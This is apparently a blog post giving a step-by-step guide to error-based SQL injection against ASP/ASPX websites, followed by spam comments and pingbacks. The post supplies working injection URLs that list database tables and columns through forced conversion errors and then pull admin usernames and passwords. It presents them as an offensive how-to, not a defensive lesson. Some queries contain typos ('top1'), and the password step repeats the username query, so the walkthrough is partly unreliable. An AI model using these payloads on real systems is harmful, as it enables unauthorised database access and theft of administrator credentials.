Hacking ASP/ASPX Websites

Hacking ASP/ ASPX WebsitesHacking ASP/ASPX sites
ASPX injection is also similar to PHP based sql injection. But here, we don’t use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.

Step 1: Find Out A Vulnerable Link
First, we need find out a vulnerable asp/aspx link which looks like

when i browse my actual link, i get the page as shown in the figure.

Step 2: Checking For Vulnerability

As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL.

If it gives an error similar to the following, then our site is vulnerable to sql injection.

In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column.  We will directly find out the table names,column names and then we will extract the data.

Step 3: Finding Out The Table Names.

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))

The above code executes the second query and retrieves the first table name from the database. the windows server cant convert character value into data type. so we will get an error as shown in the following figure from which we can get the first table name.

But this may not be the desired table for us. So we need to find out the next table name in the database.

For that, we will use the following query.

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in (‘first_table_name’)))

replace the first_table_name with the actual table name we got above.

Now we will get the second table name as shown in the figure. Still if we don’t get our desired table, we will continue the procedure until we get the  desired table name. Now the query looks like

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from  information_schema.tables where table_name not in (‘first_table_name’,’second_table_name’)))

Replace first_table_name and second_table_name with the table names we got in the above steps.

Step 4: Finding Out The Columns

Now we got the admin table. So we need to find out the columns now.

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name=’admin_table’))

Replace admin_table with the table name we got. In our case, it is “vw_system_admin”

If the first column is not related to our desired column names, then follow the steps as we have done in step 3.

http://www.vulnerablesite.com/gallery.aspx?id=10  and 1=convert(int,(select top1 column_name from information_schema.columns where table_name=’admin_table’ and column_name not in (‘first_column_name’)))

Replace first_column_name with the column name we got.

Step 5:Extracting The Data

After finding out all the columns, we need to extract the data such as user names and passwords.

For that, we use the following query

For user name,

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

 

For password,

http://www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

 

32 thoughts on “Hacking ASP/ASPX Websites

  1. I just want to mention I am beginner to blogging and seriously liked you’re web site. Likely I’m planning to bookmark your blog post . You certainly come with really good articles. Kudos for sharing with us your web site.

  2. Pingback: social media share buttons

  3. Good โ€“ I should definitely pronounce, impressed with your web site. I had no trouble navigating through all the tabs as well as related info ended up being truly easy to do to access. I recently found what I hoped for before you know it in the least. Quite unusual. Is likely to appreciate it for those who add forums or something, web site theme . a tones way for your customer to communicate. Excellent task.

  4. Pingback: xxx webcam sites

  5. Pingback: Perniagaan Online

  6. I think other website proprietors should take this web site as an model, very clean and excellent user genial style and design, as well as the content. You’re an expert in this topic!

  7. Pingback: famous

  8. Pingback: Free VPN server

  9. Pingback: bike

  10. Pingback: Mediterranean diet recipes

  11. Having read this I thought it was really enlightening. I appreciate you finding the time and energy to put this short article together. I once again find myself spending a significant amount of time both reading and commenting. But so what, it was still worthwhile!

  12. I simply want to tell you that I am just new to blogs and actually enjoyed you’re page. Probably I’m planning to bookmark your website . You amazingly have fantastic articles. Cheers for sharing with us your webpage.

  13. After exploring a number of the blog articles on your web site, I seriously appreciate your way of blogging. I book marked it to my bookmark webpage list and will be checking back soon. Take a look at my website too and tell me how you feel.

  14. Pingback: Coupon code

  15. Pingback: cloud

  16. Hi! I know this is kinda off topic but I was wondering if you knew where I could get a captcha plugin for my comment form? I’m using the same blog platform as yours and I’m having trouble finding one? Thanks a lot!

  17. Pingback: student debt

  18. Thanks a lot for sharing this with all people you really realize what you’re talking about! Bookmarked. Kindly also talk over with my site =). We may have a hyperlink trade agreement between us!

  19. hello there and thank you for your information – I’ve certainly picked up anything new from right here. I did however expertise several technical points using this website, as I experienced to reload the site a lot of times previous to I could get it to load properly. I had been wondering if your web host is OK? Not that I am complaining, but sluggish loading instances times will often affect your placement in google and can damage your high-quality score if advertising and marketing with Adwords. Anyway I am adding this RSS to my email and could look out for a lot more of your respective intriguing content. Make sure you update this again very soon..

  20. I’m honored to receive a call from my friend as he observed the important guidelines shared on your own site. Studying your blog post is a real brilliant experience. Thanks again for considering readers just like me, and I desire for you the best of achievements for a professional in this discipline.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s